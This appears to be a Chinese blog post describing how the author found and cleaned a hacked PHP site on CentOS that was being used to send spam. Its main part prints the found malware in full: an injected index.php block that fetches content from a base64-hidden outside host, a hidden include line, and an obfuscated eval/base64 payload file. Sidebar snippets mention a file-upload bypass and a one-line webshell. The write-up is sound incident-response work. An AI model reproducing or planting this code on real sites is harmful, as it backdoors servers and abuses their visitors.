解决PHP站点被黑客用于群发垃圾邮件问题

最新推荐文章于 2021-05-16 22:38:09 发布
最新推荐文章于 2021-05-16 22:38:09 发布
阅读量8.6k 收藏
点赞数
分类专栏: Open-Source 文章标签: php server 服务器 centos google include
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shizhebsys/article/details/6610572
版权

我使用的服务器为CentOS 5.6,托管于电信机房,主要用于公司开发时的版本控制,此外放置了公司网站。某天醒来,SSH登录服务器,mail中有5万余封email,内容如下:


From MAILER-DAEMON@我的域名.com Thu Jun 23 18:55:06 2011
Date: Thu, 23 Jun 2011 18:55:00 +0400
From: Mail Delivery Subsystem <MAILER-DAEMON@我的域名.com>
To: apache@我的域名.com
Subject: Returned mail: see transcript for details
……
  ----- The following addresses had permanent fatal errors -----
<dtkc58@aol.com;cloudgerald@aol.com;healthychi@earthlink.net;hobbesfam@sbcglobal.net;hockeyman88nt@a...
njr@bellsouth.net;tinasanchez@bellsouth.net;herbschultz@cox.net;jane1954@shaw.ca;kbklbecker@aol.com>
……

显然,服务器被黑客用于群发垃圾邮件,于是着手解决。首先,暂时关闭了sendmail服务,这不是长久之计,因为会影响到自己正常的应用。然后,检查sendmail的配置,查看reply是否能够用于外网地址。由于sendmail版本较新,只有来自127.0.0.1的邮件才会被转发。


然后,检查Web站点文件,发现几乎所有的PHP文件都被修改了。首先是index.php中,存在以下代码:

<?php    
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if(!(strpos($sUserAgent, 'google') === false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL29ubGluZS1pbmZvcm0uYml6L2JvdHN0YXQ0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink ); 
    }
    } else
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL29ubGluZS1pbmZvcm0uYml6L2JvdHN0YXQ0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&addcheck='.'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink ); 
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    $sResult = curl_exec($stCurlHandle); 
    echo $sResult; // Statistic code end
    curl_close($stCurlHandle); 
}
?>

其它文件的第一行,在空了很多个空格后,存在以下代码: 

if(!defined("GR_HOST_ID")){define("GR_HOST_ID", "index_prx93");}@include_once('/opt/www/plugins/functions.inc.php');


按图索骥,找到functions.inc.php这个文件,代码如下: 

<?php /*  */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x2420;eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NDdkKTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCcybWF4NXlIcEExQ1VJTGtPd05ldTh6dG40b1BRRjY5aFhCMGdZS3ZHRVpETWYvczNWakpsVytpU2RUcWJyUmM3PScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='));return;?>~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

悉数清理后,重新对站点权限进行设置,用mailq检查邮件列表,清理/var/spool/mqueue/中还未发出的垃圾邮件。 问题解决。

最后对攻击原因进行了总结,由于事先更换了SSH端口,FTP密码强度也足够,几乎所有没必要的端口我都没开,因此黑客只能是用了SQL注入的方法,套取到我的管理员密码。我们网站后台是国外某开源CMS,存在漏洞,现在通过版本升级修补了相关漏洞。




北大校园网反垃圾邮件解决方案
03-03
其中,垃圾邮件问题尤为严重,不仅阻碍正常邮件通信,还可能导致邮件服务器瘫痪。为了应对这一问题,北京敏讯科技有限公司推出了EQManager反垃圾邮件网关解决方案。 EQManager是一款基于“行为识别”的智能反垃圾...
【web漏洞】文件上传
weixin_51614272的博客
02-16 1497
user.ini配置文件可控导致的文件上传漏洞 当前目录里面有php文件的时候,可以运用ini配置文件进行配置这个php文件 文件包含配置项有auto_append_file和auto_pretend_file auto_append_file=1.txt //保存为user.ini,记得抓包时文件名是.user.ini 1.先上传这个user.ini文件,发现上传成功。 2.然后本来不能上传规定外的文件,现在就可以上传了 3.这个1.txt里面就是一句话木马 <?php @ev
python通过imap批量删除指定发件人的邮件
boyue6973的博客
07-18 1959
importimaplib box=imaplib.IMAP4_SSL('imap.mail.microsoftonline.com',993) box.login("user@domain.com","password") box.select('Inbox') #如果是查找收件箱所有邮件则是box.search(None,'ALL') typ,data=...
linux sendmail漏洞,linux-sendmail的安全-029
weixin_39631344的博客
05-16 1072
Mail的安全1.加密认证1.1sendmail提供的服务发送 smtps--Smtp 明文传输[root@mail ~]# grep smtps /etc/servicessmtps465/tcp# SMTP over SSL (TLS)[root@mail ~]# sendmail -d0.1 -bvVersion 8.13.8Compiled with: DNSMAP HESIOD HES_...
谷歌邮箱登录服务器设置
热门推荐
zhiyikeji的博客
11-29 2万+
1.下载并安装谷歌邮箱客户端 点击此处下载安装包 2.安装完成之后会进入一个登陆界面,输入用户名和要登陆的谷歌邮箱账号,点击下一步,进行网络设置 选择"POP"作为您使用的接收邮件服务器类型。 在"Incoming Server:(接收邮件服务器:)"字段中输入"pop.gmail.com “, 然后点击"Next(下一步)”。 在"User Name:(用户名:)“字段中输入 Gmail 用户...
基于PHP、JavaScript、HTML、CSS的2015年HackerGame黑客大赛设计源码
最新发布
09-29
该项目为2015年联合举办的黑客大赛设计源码,基于PHP、JavaScript、HTML和CSS开发,总文件量达23个,包含11个PHP文件、3个JavaScript文件、2个CSS文件、2个HTML文件、1个图标文件、1张图片以及1个SQL数据库文件。...
电脑被黑客攻击解决方法知识.pdf
02-07
### 电脑被黑客攻击解决方法知识 随着互联网的普及和技术的发展,网络安全问题变得越来越突出,尤其是个人电脑遭到黑客攻击的情况屡见不鲜。本文将基于《电脑被黑客攻击解决方法知识.pdf》的内容,详细介绍如何识别...
HackBulgariaAlgo1Application:解决黑客保加利亚问题
06-02
【标题】"HackBulgariaAlgo1Application:解决黑客保加利亚问题"指的是一个针对保加利亚黑客挑战的编程解决方案。在这个项目中,开发者可能遇到了一个特定的算法或逻辑难题,通过编写C++代码成功地解决了这个问题。...
电脑被黑客攻击解决方法借鉴.pdf
01-02
电脑被黑客攻击解决方法借鉴.pdf
linux mail命令发送邮件失败的解决
北雨南萍
12-13 2万+
使用linux自带的邮件功能测试邮件发送功能如下: $ mail -s test xxx@163.com sldkfjlskdjf[CTRL+D] cc: 有时会出再提示: You have a new mail in /var/spool/mail/root  并且在邮箱中看不到邮件; 解决办法: 1. 查看出错的日志 $ tail -n 50 /var/spool
[workStudy]Mail Delivery System发邮件
bigminer的专栏
04-15 4144
MDS发邮件 MDS发邮件过程 1. 打开 http://op.sogou-inc.com/mail 进入MDS页面; 2. 创建新项目。点击“创建项目”标签页,然后添加邮件详细信息,而后按“提交”按钮,(注意创建时不能添加邮件列表) 3. 确认。登陆 发送邮件用户的WebApp邮箱,确认创建项目成功; https://mail.sogou-inc.com/owa/ ,用户名:***,密
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值